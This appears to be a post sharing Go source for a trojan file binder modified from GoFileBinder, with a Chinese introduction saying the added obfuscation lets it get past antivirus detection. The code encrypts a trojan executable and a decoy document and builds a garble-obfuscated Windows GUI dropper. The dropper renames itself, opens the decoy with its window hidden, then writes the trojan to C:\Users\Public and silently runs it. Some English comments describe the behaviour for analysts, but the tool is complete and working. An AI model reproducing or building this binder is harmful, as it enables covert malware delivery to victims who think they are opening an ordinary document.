利用https://github.com/Yihsiwei/GoFileBinder改了加密算法和编译混淆。最开始不加混淆是可以过的,可能是测试次数多了,后来加了混淆才能过,后面有时间再改改。

package main

import (
    "crypto/rc4"
    "encoding/base64"
    "fmt"
    "io/ioutil"
    "log"
    "math/rand"
    "os"
    "os/exec"
    "path/filepath"
    "strings"
    "time"
)

var (
    // logo is the ASCII-art banner printed at startup.
    logo = `
    \__  |   |   |  |__   _____|__|_  _  __ ____ |__|
    /   |   |   |  |  \ /  ___/  \ \/ \/ // __ \|  |
    \____   |   |   Y  \\___ \|  |\     /\  ___/|  |
    / ______|___|___|  /____  >__| \/\_/  \___  >__|
    \/               \/     \/                \/   
    `
    // tvb is a one-line credit printed under the banner (Chinese: the
    // encryption routine was changed from Yihsiwei/GoFileBinder).
    tvb = "用 Yihsiwei/GoFileBinder 改了一下加密算法"

    // keytishi is the usage text printed when the argument count is wrong
    // (Chinese): the tool expects two positional arguments, an executable
    // followed by a document file.
    keytishi = `
    首先编译好命令参数如: GoFileBinder.exe    木马.exe xxx.txt
    `
)

// RandStr returns a string of length uppercase ASCII letters (A-Z) drawn
// from math/rand. The global generator is reseeded from the wall clock on
// every call, so math/rand is neither cryptographically secure here nor
// guaranteed to differ between two calls in the same nanosecond; the value
// is used by the caller as an RC4 key that is emitted in clear text into the
// generated source, so its quality has no bearing on confidentiality anyway.
// A length <= 0 yields "".
func RandStr(length int) string {
    const alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    // Seed before the length check so the side effect on the global
    // generator is the same for every call.
    rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100)))
    if length <= 0 {
        return ""
    }
    out := make([]byte, length)
    for i := range out {
        out[i] = alphabet[rand.Intn(len(alphabet))]
    }
    return string(out)
}
// main is the builder entry point. It reads the two files named on the
// command line, RC4-encrypts each under a freshly generated 16-letter key,
// writes a Go source file (qqupdate.go) that embeds the key and both
// ciphertexts, and compiles it through a generated batch file that calls
// garble with a stripped, windowsgui build.
//
// Notes for an analyst reading the template below:
//   - The RC4 key is written in clear text into the generated source and
//     therefore into the built binary, so both embedded files are
//     recoverable statically; RC4 is obfuscation here, not confidentiality.
//   - Builder-side artifacts are qqupdate.go and qqupdate.bat (deleted at
//     the end) and qqupdate.exe (left in place).
//   - The generated program, as written in the template, renames its own
//     executable to <drive>\Users\Public\qqupdate.DAT (or <drive>\qqupdate.DAT
//     when not on C:), recreates the second input under its original name
//     and opens it via "cmd /c" with HideWindow set, then writes the first
//     input to C:\Users\Public\ and starts it.
//
// Every file and process error in this function is discarded.
func main() {

    fmt.Println(logo)
    fmt.Println(tvb)
    if len(os.Args) != 3 {
        fmt.Println(keytishi)
        return
    }
    mumafile := os.Args[1]
    docfile := os.Args[2]
    key := RandStr(16)

    // Read errors are ignored: a missing input silently becomes an empty
    // payload. rc4encode overwrites its input buffer in place; the []byte
    // conversion hands it a fresh copy.
    info, _ := ioutil.ReadFile(mumafile)
    var mumafileStr string = string(info[:])
    AesmumafileStr := rc4encode([]byte(mumafileStr), []byte(key))

    infodoc, _ := ioutil.ReadFile(docfile)
    var docfileStr string = string(infodoc[:])
    AesdocfileStr := rc4encode([]byte(docfileStr), []byte(key))
    // Source of the generated program. Placeholders, in order: key, first
    // input path, second input path, "\\\\" + second input path (used as the
    // cmd argument), second ciphertext, first ciphertext. Paths are inserted
    // as Go string literals; strings.Replace(..., 1) doubles the first
    // backslash in each. The raw string below is runtime data and is left
    // exactly as the author wrote it.
    SourceCode := fmt.Sprintf(`package main

import (
    "crypto/rc4"
    "encoding/base64"
    "log"
    "os"
    "os/exec"
    "strings"
    "syscall"
)

var (
    key          = "%s"
    mumafilename = "%s"
    docfilename  = "%s"
    docfilenames = "%s"
    docfile      = "%s"

    numafile   = "%s"
    dstFile    = "\\Users\\Public\\qqupdate.DAT"
    selfile, _ = os.Executable()
    ddocfile   = rc4decode([]byte(docfile), []byte(key))
    dmumafile  = rc4decode([]byte(numafile), []byte(key))
)

func main() {
    panfu := selfile[0:2]
    if !strings.Contains(selfile, "C:") {

        dstFile = panfu + "\\qqupdate.DAT"
    } else {
        dstFile = panfu + dstFile
    }
    os.Rename(selfile, dstFile)
    f2, _ := os.Create(docfilename)
    _, _ = f2.Write([]byte(ddocfile))
    f2.Close()
    strccc, _ := os.Getwd()
    cmd := exec.Command("cmd", " /c ", strccc+docfilenames)
    cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    //cmd2.Stdout = os.Stdout
    _ = cmd.Start()
    var dstFilecc = "C:\\Users\\Public\\" + mumafilename
    f, _ := os.Create(dstFilecc)
    _, _ = f.Write([]byte(dmumafile))
    f.Close()
    _, err := os.Stat(dstFilecc)
    if err == nil {
        cmda := exec.Command(dstFilecc)
        _ = cmda.Start()
    }

}
// RC4解密操作
func rc4decode(str []byte, key []byte) string {
    str, err := base64.StdEncoding.DecodeString(string(str))
    if err != nil {
        log.Fatalln(err)
    }
    cipher2, _ := rc4.NewCipher(key)
    cipher2.XORKeyStream(str, str) // 解密后的数据直接覆盖到str中
    //fmt.Printf("方法2解密后:%s \n\n", str)
    return string(str)
}`, key, strings.Replace(mumafile, "\\", "\\\\", 1), strings.Replace(docfile, "\\", "\\\\", 1), "\\\\"+strings.Replace(docfile, "\\", "\\\\", 1), AesdocfileStr, AesmumafileStr)

    // Write the generated source into the working directory (errors discarded).
    f, _ := os.Create("qqupdate.go")

    _, _ = f.Write([]byte(SourceCode))
    f.Close()

    // exitfile polls until the file is visible and never times out; the
    // sleep afterwards is an unexplained fixed delay.
    exitfile("qqupdate.go")
    time.Sleep(time.Duration(1) * time.Second)

    // Build via garble: -tiny/-literals/-seed=random obfuscate the binary,
    // -w -s strip symbol and DWARF data, -H windowsgui makes a console-less
    // executable. The commented line is the plain go build alternative.
    batfile, _ := os.Create("qqupdate.bat")

    _, _ = batfile.Write([]byte("garble -tiny -literals -seed=random build -ldflags=\"-w -s -H windowsgui\" qqupdate.go"))
    //_, _ = batfile.Write([]byte("go build -trimpath -ldflags=\"-w -s -H=windowsgui\" qqupdate.go"))
    batfile.Close()
    exitfile("qqupdate.bat")
    time.Sleep(time.Duration(1) * time.Second)
    // Start does not wait for the build; the exitfile call below is what
    // blocks until qqupdate.exe appears.
    cmd := exec.Command("qqupdate.bat")
    _ = cmd.Start()

    // Remove the intermediate source and batch file; qqupdate.exe stays.
    exitfile("qqupdate.exe")
    os.RemoveAll("qqupdate.go")
    os.RemoveAll("qqupdate.bat")

}
// exitfile blocks until filename exists in the directory of the running
// program (as resolved by GetCurrentDirectory), polling once per second.
// It never times out: if the file never appears the caller hangs forever.
// Only existence is checked, so a partially written file also ends the wait.
func exitfile(filename string) {
    present := func() bool {
        _, err := os.Stat(GetCurrentDirectory() + "/" + filename)
        return err == nil
    }
    for {
        time.Sleep(time.Second)
        if present() {
            return
        }
    }
}
// GetCurrentDirectory returns the absolute directory of the program as it
// was invoked (derived from os.Args[0], not os.Executable), with every
// backslash rewritten to a forward slash. If the path cannot be made
// absolute the process exits through log.Fatal.
func GetCurrentDirectory() string {
    abs, err := filepath.Abs(filepath.Dir(os.Args[0]))
    if err != nil {
        log.Fatal(err)
    }
    return strings.ReplaceAll(abs, "\\", "/")
}

// RC4加密操作
func rc4encode(str []byte, key []byte) string {

    //fmt.Printf("方法2加密前:%s \n", str)
    cipher1, _ := rc4.NewCipher(key)
    cipher1.XORKeyStream(str, str) // 加密后的数据直接覆盖到str中
    encodeString := base64.StdEncoding.EncodeToString([]byte(str))
    //fmt.Printf("方法2加密后:%x \n", encodeString)
    return string(encodeString)
}